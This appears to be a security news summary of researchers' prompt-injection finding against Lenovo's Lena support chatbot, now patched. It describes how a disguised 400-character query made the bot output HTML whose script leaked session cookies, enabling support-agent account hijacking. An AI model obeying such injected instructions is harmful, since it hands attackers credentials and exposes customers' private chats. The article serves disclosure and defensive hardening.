Lenovo’s AI-powered customer service chatbot, Lena, has been found vulnerable to a cleverly crafted prompt injection that allowed attackers to steal active session cookies and hijack support agent accounts. Cybernews researchers demonstrated how a single 400-character prompt, disguised as a regular request (like asking for product specs), could trick Lena into outputting HTML—including malicious script instructions—that, when rendered by a browser, exfiltrated session cookies to an external server. This opens the door to serious risks: impersonating agents, running system commands, installing backdoors, and lateral movement across the network. Lenovo has since patched the flaw, but experts warn this episode highlights a broader issue: the tendency of chatbots to obey any instruction unless aggressive sanitization and verification measures are enforced.
Sources: TechRadar, Security Boulevard, WebPro News
Key Takeaways
– Single-prompt XSS exploit: A single cleverly hidden instruction inside a normal-sounding query triggered a cross-site scripting attack that leaked session cookies.
– Broader AI vulnerability: The case underscores how generative AI systems, if not correctly sandboxed and filtered, can turn from helpful agents into internal security threats.
– Urgent need for hardening: The incident serves as a warning for enterprises to implement strict input/output sanitization, robust verification, and sandboxing for AI-driven customer support systems.
In-Depth
Lenovo’s Lena chatbot was simply doing its job—answering customer queries—until researchers at Cybernews turned its helpfulness into a vulnerability. They crafted a 400-character prompt: part innocuous customer request, part hidden malicious payload.
By instructing the chatbot to format its response in HTML, they embedded a script that caused a browser to send session cookies to a remote server when the placeholder image failed to load. That session cookie was essentially a golden key—it allowed attackers to impersonate customer support agents without needing login credentials, potentially enabling them to access private chats, execute system-level commands, or even plant backdoors.
Lenovo has patched the vulnerability, but what makes this episode alarming is how easily it was triggered. Large language models are inherently “people-pleasers,” apt to follow any instruction—even malicious ones—unless confined by rigorous guardrails. As AI tools permeate enterprise workflows, this incident underscores how imperative it is to treat AI output as untrusted, enforce strict content sanitization, and require rigorous vetting of generated content. What’s more, enterprises should adopt a “never trust, always verify” stance toward AI responses, just as they would any external input in their system.

